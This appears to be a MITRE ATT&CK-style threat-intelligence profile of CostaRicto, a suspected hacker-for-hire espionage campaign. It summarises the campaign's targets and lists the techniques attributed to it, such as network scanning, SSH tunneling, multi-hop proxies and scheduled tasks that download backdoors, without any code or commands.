CostaRicto is a suspected hacker-for-hire cyber espionage campaign that has targeted multiple industries worldwide since at least 2019. CostaRicto's targets, a large portion of which are financial institutions, are scattered across Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia.[1]
Domain | ID | Name | Use | |
---|---|---|---|---|
Enterprise | T1046 | Network Service Discovery |
CostaRicto employed nmap and pscan to scan target environments.[1] |
|
Enterprise | T1588 | .002 | Obtain Capabilities: Tool |
CostaRicto has obtained open source tools to use in their operations.[1] |
Enterprise | T1572 | Protocol Tunneling |
CostaRicto has set up remote SSH tunneling into the victim's environment from a malicious domain.[1] |
|
Enterprise | T1090 | .003 | Proxy: Multi-hop Proxy |
CostaRicto has used a layer of proxies to manage C2 communications.[1] |
Enterprise | T1053 | .005 | Scheduled Task/Job: Scheduled Task |
CostaRicto has used scheduled tasks to download backdoor tools.[1] |